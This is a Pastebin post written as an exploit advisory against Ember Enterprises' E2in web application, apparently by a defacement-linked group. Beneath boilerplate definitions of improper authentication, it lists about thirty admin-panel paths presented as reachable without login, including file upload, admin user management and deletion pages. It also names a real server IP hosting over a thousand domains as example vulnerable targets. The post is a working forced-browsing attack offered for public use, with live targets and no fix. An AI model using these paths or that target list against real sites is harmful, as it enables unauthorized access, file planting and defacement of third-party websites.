Advertisement
KingSkrupellos

Ember Enterprises E2in Improper Authentication

Dec 12th, 2020
104
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 4.46 KB | None | 0 0
  1. ####################################################################
  2.  
  3. # Exploit Title : Ember Enterprises E2in Improper Authentication
  4. # Author [ Discovered By ] : KingSkrupellos
  5. # Team : Cyberizm Digital Security Army
  6. # Date : 13/12/2020
  7. # Vendor Homepage : e2in.com
  8. # Tested On : Windows and Linux
  9. # Category : WebApps
  10. # Exploit Risk : Medium
  11. # Vulnerability Type : CWE-287 [ Improper Authentication ]
  12. CAPEC-115 [ Authentication Bypass ]
  13. # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
  14. # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
  15. # Zone-H : zone-h.org/archive/notifier=KingSkrupellos
  16. zone-h.org/archive/notifier=CyBeRiZM
  17. # Pastebin : pastebin.com/u/KingSkrupellos
  18.  
  19. ####################################################################
  20.  
  21. # Impact :
  22. ***********
  23. CWE-287 [ Improper Authentication ]
  24. ************************************
  25. Authentication is any process by which a system verifies the identity of a user who wishes
  26. to access it.When an actor claims to have a given identity, the software does not
  27. prove or insufficiently proves that the claim is correct. Improper authentication
  28. occurs when an application improperly verifies the identity of a user.
  29. A software incorrectly validates user's login information and as a result, an attacker can
  30. gain certain privileges within the application or disclose sensitive information that allows
  31. them to access sensitive data and provoke arbitrary code execution.
  32. The weakness is introduced during Architecture and Design, Implementation stages.
  33.  
  34. CAPEC-115 [ Authentication Bypass ]
  35. *************************************
  36. An attacker gains access to application, service, or device with the privileges
  37. of an authorized or privileged user by evading or circumventing an authentication mechanism.
  38. The attacker is therefore able to access protected data without authentication ever having taken place.
  39. This refers to an attacker gaining access equivalent to an authenticated user without ever going
  40. through an authentication procedure. This is usually the result of the attacker using an unexpected
  41. access procedure that does not go through the proper checkpoints where authentication should occur.
  42. For example, a web site might assume that all users will click through a given link in order to get to
  43. secure material and simply authenticate everyone that clicks the link. However, an attacker might be
  44. able to reach secured web content by explicitly entering the path to the content rather than clicking
  45. through the authentication link, thereby avoiding the check entirely. This attack pattern differs from
  46. other authentication attacks in that attacks of this pattern avoid authentication entirely, rather than
  47. faking authentication by exploiting flaws or by stealing credentials from legitimate users.
  48.  
  49. ####################################################################
  50.  
  51. # Authentication Bypass / Improper Authentication /
  52. Admin Panel Login Bypass Exploit / File Upload => Unauthorized File Insert
  53. ******************************************************************
  54. /secured/
  55. /secured/index.php?p=locations
  56. /secured/index.php?p=regions
  57. /secured/index.php?p=addbanner
  58. /secured/index.php?p=banners
  59. /secured/index.php?p=testimonial
  60. /secured/index.php?p=testimonials
  61. /secured/index.php?p=homepage
  62. /secured/index.php?p=pagecontent
  63. /secured/index.php?p=access_logs
  64. /secured/index.php?p=kcnrbulletin
  65. /secured/index.php?p=planroom
  66. /secured/index.php?p=subscribe
  67. /secured/index.php?p=contact
  68. /secured/index.php?p=uploadfile
  69. /secured/index.php?p=faqs
  70. /secured/index.php?p=create_project
  71. /secured/index.php?p=projects
  72. /secured/index.php?p=deleteprojects
  73. /secured/index.php?p=contract_award
  74. /secured/index.php?p=contract_award_list
  75. /secured/index.php?p=adminuser
  76. /secured/index.php?p=adminusers
  77. /secured/index.php?p=newsubscriber
  78. /secured/index.php?p=subscribers
  79. /secured/index.php?p=bid
  80. /secured/index.php?p=bids
  81. /secured/index.php?p=archive_projects
  82. /secured/index.php?p=bulletin
  83. /secured/index.php?p=bulletins
  84.  
  85. ScreenShot Administrator Control Panel =>
  86.  
  87. https://www.upload.ee/image/12633562/Ei2nAdminPanelVulnCxSec12-12-2020.png
  88.  
  89. Example Vulnerable IP Addresses and Websites =>
  90.  
  91. Reverse IP results for (162.241.219.170)
  92. There are 1,248 domains hosted on this server.
  93.  
  94. ####################################################################
  95.  
  96. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
  97.  
  98. ####################################################################
  99.  
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement